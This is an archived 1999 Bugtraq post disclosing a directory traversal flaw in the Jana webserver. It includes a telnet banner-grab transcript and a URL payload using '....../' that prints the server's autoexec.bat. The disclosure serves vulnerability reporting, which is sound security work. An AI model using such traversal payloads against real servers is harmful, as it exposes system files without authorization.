Date: Пт, 08 окт 1999 19:00:11
От: Jason Lutz <jason@SPIS.NET>
Кому: BUGTRAQ@SECURITYFOCUS.COM
Тема: Jana webserver exploit
--------------------------------------------------------------------------------
Bugtraq,
I have found a security flaw in Jana 1.0 webserver. I have not been able to find out any information on who makes this product nor a place to download the web server package. This webserver seems to be included as a suite of Internet services, one of witch I think is web-based chat. Enclosed is one exploit I have found in the limited time that I have had to deal with this web server. I am posting this information now so that one of you might know who makes this software and how I might be able to get in touch with them for further testing.
.
[root@foo whis]# telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 200 OK
Date: Mon, 04 Oct 1999 18:59:44 GMT
Server: Jana Server/1.40
Last-Modified: Mon, 04 Oct 1999 15:04:40 GMT
Content-Length: 38
Content-Type: text/html
Connection: close
<HTML><BODY><CENTER>TEST</BODY></HTML>Connection closed by foreign host.
[root@foo whis]#
http://server/....../autoexec.bat
Prints user's autoexec.bat
I would like to say thank you to rain.forest.puppy. for all his help.
